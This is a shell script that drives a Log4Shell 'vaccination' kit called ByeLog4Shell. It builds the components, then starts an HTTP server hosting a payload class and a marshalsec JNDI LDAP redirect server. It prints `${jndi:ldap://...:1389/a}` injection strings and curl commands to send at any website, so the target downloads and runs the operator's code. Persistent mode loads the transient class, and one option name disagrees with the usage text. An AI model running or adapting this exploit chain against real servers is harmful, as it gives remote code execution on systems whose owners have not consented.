#!/bin/sh
# Qerim Iseni Made ByeLog4Shell

die() {
    printf "%s\n" "$1" >&2
    exit 1
}
usage() {                                 
  echo "Usage:  $0 -h | --help | Display This Usage Page
  	$0 -i | --install | Install ByeLog4Shell and its Dependencies (Without The Scanner and Log4Shell Testing Env)
  	$0 -ia | --install-all | Install all ByeLog4Shell Features and Depencies (With Scanner and Testing Env)
  	$0 -rte | --run-testing-env | Run the Log4Shell Testing Env (will start an other Terminal and will run in BG till its closed)
  	$0 -s [URL] | --scan [URL] | Scan an Website for Log4Shell Vulnerability
        $0 -rp | --run-persistent | Run ByeLog4Shell in Persistent mode
        $0 -rt | --run-transient | Run ByeLog4Shell in Transient mode" 1>&2 
}
exit_abnormal() {                        
  usage
  exit 1
}
testingenv() {
echo "Starting Testing env"
cd L4S-E-T
gnome-terminal -- sudo bash make.sh run
echo "Tip: Run curl -X GET -G --data-urlencode 'foo=\${jndi:ldap://$(dig +short myip.opendns.com @resolver1.opendns.com):1389/a}' [Website] to see some Hacking action on the Env"
}

installall() {
echo "Installing Extra Features and Dependencies for ByeLog4Shell"
sudo apt-get update
sudo apt install -y maven gnome-terminal unzip docker.io python3
unzip ByeLog4Shell.zip
cd ByeLog4ShellScanner
pip install -r requirements.txt
cd ..
cd L4S-E-T
sudo bash make.sh build
cd ..
cd ByeLog4ShellVaccinator
mvn package
cd ..
cd byelog4shellserver
mvn package -DskipTests
cd ..
}

installb() {
echo "Installing Dependencies for ByeLog4Shell"
sudo apt-get update
sudo apt install -y maven gnome-terminal unzip
unzip ByeLog4Shell.zip
cd ByeLog4ShellVaccinator
mvn package
cd ..
cd byelog4shellserver
mvn package -DskipTests
cd ..
}
runt() {
echo Running ByeLog4Shell in Transient Mode
cd ByeLog4ShellVaccinator/target/classes
gnome-terminal -- python3 -m http.server 8888
cd ..
cd ..
cd ..
cd byelog4shellserver/target
gnome-terminal -- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0:8888/#Log4jRCETransient
echo "Now enter \${jndi:ldap://$(dig +short myip.opendns.com @resolver1.opendns.com):1389/a} into a vulnerable field (such as user name) to Vaccinate a Server against Log4Shell Vulnerability"
echo "Or enter this Command in the Terminal:"
echo "curl -X GET -G --data-urlencode 'foo=\${jndi:ldap://$(dig +short myip.opendns.com @resolver1.opendns.com):1389/a}' [Website]"
exit
}
runp() {
echo Running ByeLog4Shell in Persistent Mode
cd ByeLog4ShellVaccinator/target/classes
gnome-terminal -- python3 -m http.server 8888
cd ..
cd ..
cd ..
cd byelog4shellserver/target
gnome-terminal -- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0:8888/#Log4jRCETransient
echo "Now enter \${jndi:ldap://$(dig +short myip.opendns.com @resolver1.opendns.com):1389/a} into a vulnerable field (such as user name) to Vaccinate a Server against Log4Shell Vulnerability"
echo "Or enter this Command in the Terminal:"
echo "curl -X GET -G --data-urlencode 'foo=\${jndi:ldap://$(dig +short myip.opendns.com @resolver1.opendns.com):1389/a}' [Website]"
exit
}
while :; do
    case $1 in
        -h|-\?|--help)
        echo ByeLog4Shell By Qerim Iseni09
        usage
            exit
            ;;
	 -i|--install)
	echo ByeLog4Shell By Qerim Iseni09
        installb
            exit
            ;;
        -ia|--install-all)
	echo ByeLog4Shell By Qerim Iseni09
        installall
            exit
            ;;
        -rte|--run-testing-env)
	echo ByeLog4Shell By Qerim Iseni09
        testingenv
            exit
            ;;
        -rp|--run-persistence)
        echo ByeLog4Shell By Qerim Iseni09
        runp
            exit
            ;;
        -rt|--run-transient)
	echo ByeLog4Shell By Qerim Iseni09
        runt
            exit
            ;;
        -s |--scan)
        echo ByeLog4Shell By Qerim Iseni09
        if [ -z "$2" ]
        then
      	echo "Error: Expected an Url"
      	exit
	else
	cd ByeLog4ShellScanner
	python3 Scanner.py -w -r -u $2
	cd ..
	exit
	fi
		;;
        -?*)
        echo ByeLog4Shell By Qerim Iseni09
            printf "WARN: Unknown option (ignored): %s\n" "$1" >&2
            ;;
        *)               
           usage
            break
    esac

    shift
done
